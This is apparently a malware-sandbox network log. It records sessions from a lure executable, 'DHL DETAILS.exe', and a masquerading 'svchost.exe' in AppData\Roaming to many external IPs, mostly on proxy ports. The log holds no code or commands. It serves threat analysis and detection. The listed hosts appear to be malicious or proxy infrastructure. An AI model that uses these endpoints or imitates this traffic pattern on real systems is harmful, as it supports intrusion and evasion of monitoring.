5078	192.168.2.5	64622	148.72.206.84	2536	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5079	192.168.2.5	49421	45.138.87.238	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5080	192.168.2.5	64162	121.204.179.70	7777	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5081	192.168.2.5	64957	174.77.111.196	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5082	192.168.2.5	49222	171.244.140.160	15084	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5083	192.168.2.5	64984	142.54.232.6	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5084	192.168.2.5	49415	188.166.17.18	8881	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5085	192.168.2.5	49228	220.194.189.144	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5086	192.168.2.5	49425	3.90.100.12	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5087	192.168.2.5	63372	51.75.126.150	4228	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5088	192.168.2.5	64659	16.162.211.90	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5089	192.168.2.5	63343	115.89.203.59	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5090	192.168.2.5	49471	104.16.108.149	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5091	192.168.2.5	49455	138.68.60.8	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5092	192.168.2.5	49429	194.247.173.17	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5093	192.168.2.5	49439	145.239.199.241	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5094	192.168.2.5	49447	51.158.125.135	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5095	192.168.2.5	49498	104.16.106.65	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5096	192.168.2.5	49448	81.250.223.126	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5097	192.168.2.5	49508	104.25.230.252	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5098	192.168.2.5	49515	104.19.225.70	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5099	192.168.2.5	49516	172.67.181.136	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5100	192.168.2.5	49539	104.20.233.70	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5101	192.168.2.5	49549	45.12.31.3	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5102	192.168.2.5	49553	185.162.230.201	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5103	192.168.2.5	49282	35.199.90.225	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5104	192.168.2.5	49560	104.22.1.113	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5105	192.168.2.5	49565	104.18.220.95	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5106	192.168.2.5	49459	91.107.180.250	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5107	192.168.2.5	49466	51.75.125.208	27029	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5108	192.168.2.5	49474	34.95.243.122	8081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5109	192.168.2.5	49502	52.13.248.29	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5110	192.168.2.5	49308	158.220.91.231	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5111	192.168.2.5	49245	192.111.137.35	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5112	192.168.2.5	49284	117.54.114.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5113	192.168.2.5	49461	171.244.140.160	17525	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5114	192.168.2.5	49475	18.135.133.116	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5115	192.168.2.5	49544	45.62.235.18	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5116	192.168.2.5	49955	103.133.222.170	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5117	192.168.2.5	49960	103.133.222.170	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5118	192.168.2.5	49975	103.133.222.170	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5119	192.168.2.5	49989	103.133.222.170	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5120	192.168.2.5	50022	49.51.93.222	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5121	192.168.2.5	50033	49.51.93.222	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5122	192.168.2.5	49600	142.4.123.41	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5123	192.168.2.5	50053	49.51.93.222	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5124	192.168.2.5	50075	49.51.93.222	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5125	192.168.2.5	49569	187.49.191.14	999	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5126	192.168.2.5	64758	161.97.147.193	43131	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5127	192.168.2.5	49633	104.25.115.125	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5128	192.168.2.5	49512	52.196.1.182	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5129	192.168.2.5	49328	162.241.53.72	55693	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5130	192.168.2.5	49647	104.27.122.6	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5131	192.168.2.5	49640	162.159.242.10	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5132	192.168.2.5	49650	74.48.7.43	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5133	192.168.2.5	49673	172.67.182.150	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5134	192.168.2.5	49572	18.169.83.87	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5135	192.168.2.5	49504	51.89.173.40	3100	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5136	192.168.2.5	49488	5.135.83.214	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5137	192.168.2.5	49627	107.181.161.81	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5138	192.168.2.5	49684	104.18.136.28	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5139	192.168.2.5	49698	104.24.136.68	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5140	192.168.2.5	49631	52.73.224.54	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5141	192.168.2.5	49554	45.120.178.197	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5142	192.168.2.5	49337	192.163.202.88	10185	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5143	192.168.2.5	49779	104.20.75.31	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5144	192.168.2.5	49783	104.27.37.131	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5145	192.168.2.5	49804	104.20.51.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5146	192.168.2.5	49785	185.162.228.128	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5147	192.168.2.5	49552	103.23.100.1	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5148	192.168.2.5	49649	3.21.101.158	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5149	192.168.2.5	49571	134.209.189.42	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5150	192.168.2.5	49793	162.159.242.159	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5151	192.168.2.5	49526	190.128.228.182	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5152	192.168.2.5	49579	51.75.126.150	35632	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5153	192.168.2.5	49877	185.162.229.127	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5154	192.168.2.5	49609	119.196.168.183	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5155	192.168.2.5	49347	5.189.163.210	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5156	192.168.2.5	49583	31.148.207.153	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5157	192.168.2.5	49954	104.19.171.188	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5158	192.168.2.5	50172	172.67.36.21	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5159	192.168.2.5	49596	91.241.217.58	9090	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5160	192.168.2.5	49369	8.222.175.210	50554	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5161	192.168.2.5	49483	90.188.250.16	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5162	192.168.2.5	49619	189.85.82.38	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5163	192.168.2.5	50088	185.238.228.240	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5164	192.168.2.5	50314	36.94.2.138	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5165	192.168.2.5	49993	216.215.125.178	48324	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5166	192.168.2.5	50357	36.94.2.138	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5167	192.168.2.5	49646	136.244.99.51	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5168	192.168.2.5	63460	162.223.94.164	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5169	192.168.2.5	50222	104.25.184.189	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5170	192.168.2.5	50359	36.94.2.138	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5171	192.168.2.5	50360	36.94.2.138	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5172	192.168.2.5	49741	20.210.113.32	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5173	192.168.2.5	50122	162.240.231.211	41166	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5174	192.168.2.5	49376	138.36.150.16	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5175	192.168.2.5	49867	198.199.86.11	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5176	192.168.2.5	49642	14.103.24.20	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5177	192.168.2.5	49637	43.128.146.42	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5178	192.168.2.5	49574	5.44.42.115	58386	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5179	192.168.2.5	50216	35.185.196.38	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5180	192.168.2.5	49715	3.122.84.99	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5181	192.168.2.5	50062	45.196.150.195	5432	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5182	192.168.2.5	50158	138.197.92.110	4527	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5183	192.168.2.5	49357	167.86.69.142	42214	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5184	192.168.2.5	50236	157.185.157.151	26589	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5185	192.168.2.5	63424	72.49.49.11	31034	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5186	192.168.2.5	50240	94.131.63.44	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5187	192.168.2.5	49659	203.89.8.107	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5188	192.168.2.5	50229	172.245.159.177	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5189	192.168.2.5	49577	124.163.236.54	7302	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5190	192.168.2.5	50009	195.154.172.161	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5191	192.168.2.5	49836	47.122.45.221	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5192	192.168.2.5	49693	103.121.39.158	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5193	192.168.2.5	50323	104.18.234.218	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5194	192.168.2.5	49825	202.150.1.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5195	192.168.2.5	50168	13.37.59.99	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5196	192.168.2.5	50129	94.23.220.136	35805	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5197	192.168.2.5	50343	172.67.182.165	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5198	192.168.2.5	50346	104.19.247.62	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5199	192.168.2.5	49806	103.231.78.36	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5200	192.168.2.5	50202	123.126.158.50	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5201	192.168.2.5	50133	194.34.232.107	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5202	192.168.2.5	50238	46.17.63.166	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5203	192.168.2.5	50164	211.222.252.187	8193	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5204	192.168.2.5	50577	8.219.135.23	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5205	192.168.2.5	50592	8.219.135.23	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5206	192.168.2.5	50596	8.219.135.23	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5207	192.168.2.5	50598	8.219.135.23	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5208	192.168.2.5	50089	171.250.222.13	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5209	192.168.2.5	50249	130.162.213.175	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5210	192.168.2.5	50131	182.52.229.165	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5211	192.168.2.5	50377	74.48.7.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5212	192.168.2.5	50385	185.162.229.112	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5213	192.168.2.5	50242	111.90.150.109	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5214	192.168.2.5	49885	172.232.111.247	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5215	192.168.2.5	50254	123.30.154.171	7777	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5216	192.168.2.5	50421	185.162.231.254	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5217	192.168.2.5	50442	107.180.103.214	45870	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5218	192.168.2.5	50844	93.190.24.119	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5219	192.168.2.5	50393	107.181.161.81	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

